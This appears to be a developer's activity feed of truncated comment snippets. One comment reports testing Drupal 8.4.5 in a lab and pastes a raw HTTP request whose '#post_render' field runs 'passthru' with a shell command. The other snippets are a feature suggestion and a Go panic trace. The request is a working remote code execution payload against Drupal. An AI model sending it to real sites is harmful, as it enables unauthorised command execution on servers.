alfonsocaponi
alfonsocaponi
I follow the instructions but it seems that the version 8.4.5 is not vulnerable on my system: Ubuntu 16.04.3 LTS PHP Version 7.0.22-0ubuntu0.16.04.1 other evidences?
POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1 Host: 192.168.253.128 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.12.4 Content-Length: 130 Content-Type: application/x-www-form-urlencoded mail%5B%23markup%5D=pwd&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=passthruHTTP/1.1 200 OK Date: Mon, 23 Apr 2018 11:48:42 GMT Server: Apache/2.4.18...
True, but if it were **optional**... :) For example, putting title in square brackets. Just a note, remove "multi spaces" (keep only single spaces) and "carriage return": 200 - 17KB...
Yes, I agree with you. It would just be a way to filter through large numbers :)
**v3.11.11 on Ubuntu 18.04.6 LTS** panic: runtime error: invalid memory address or nil pointer dereference [recovered] panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation...